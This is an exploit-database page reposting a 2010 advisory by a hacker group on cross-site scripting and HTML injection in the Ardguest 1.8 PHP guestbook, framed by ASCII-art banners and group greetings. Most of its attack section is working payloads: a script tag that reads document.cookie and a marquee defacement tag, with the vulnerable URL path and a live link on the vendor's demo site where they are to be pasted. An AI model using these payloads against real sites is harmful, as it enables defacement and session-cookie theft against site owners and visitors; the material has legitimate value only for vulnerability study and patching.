Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtTh3 RDX1337DAY-ID-13018
HistoryJun 28, 2010 - 12:00 a.m.

Ardguest 1.8 XSS/HTML Injection Vulnerabilities

2010-06-2800:00:00
Th3 RDX
0day.today
30
JSON

Exploit for php platform in category web applications

===============================================
Ardguest 1.8 XSS/HTML Injection Vulnerabilities
===============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #####################################             1
0                    I'm Th3 RDX member from Inj3ct0r Team             1
1                    #####################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Exploit Title: Ardguest 1.8 (XSS|HTML Injection) Multiple Vulnerabilities
# Date: 28-06-2010
# Author: Th3 RDX
# Software Link:
# Version: 1.8
# Tested on: Demo Site
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky, r0073r(inj3ct0r.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   RooT Bro waiting for u to come online desperately and missing you alot
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

        Th3 RDX

----- [ E - mail ] -----

    [email protected]


                                                        %\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Ardguest 1.8 (XSS|HTML Injection) Multiple Vulnerabilities

----- [ Vendor ] -----

http://www.promosi-web.com/script/guestbook/

                                                        %\\
##############################################################################

##############################################################################
%//

----- [ Injection (s) ] -----

----- [ XSS Injection ] -----

Put [XSS CODE] = <script>alert(document.cookie)</script>

[XSS] http://server/ardguest/ardguest.php?do=add_form&page=1

      In Search Box Paste Code: [XSS CODE]

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

----- [ HTML Injection ] -----

Put [HTML CODE] = <marquee><font color=Red size=16>Th3 RDX/font></marquee>

[HTML] http://server/ardguest/ardguest.php?do=add_form&page=1

     In Search Box Paste Code: [HTML CODE]

                                                        %\\
##############################################################################

##############################################################################
%//

              >>>>>> TESTED ON <<<<<<

----- [ Live Link (s) ] -----

[Link] http://www.promosi-web.com/script/guestbook/demo/ardguest.php?do=add_form&page=1

      In Search Box Paste Code: [CODE (XSS + HTML) ]

                                                        %\\
##############################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PROUD TO BE AN INDIAN

c0d3 for motherland, h4ck for motherland

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.

Bug discovered : 28 June 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#



#  0day.today [2018-03-09]  #
JSON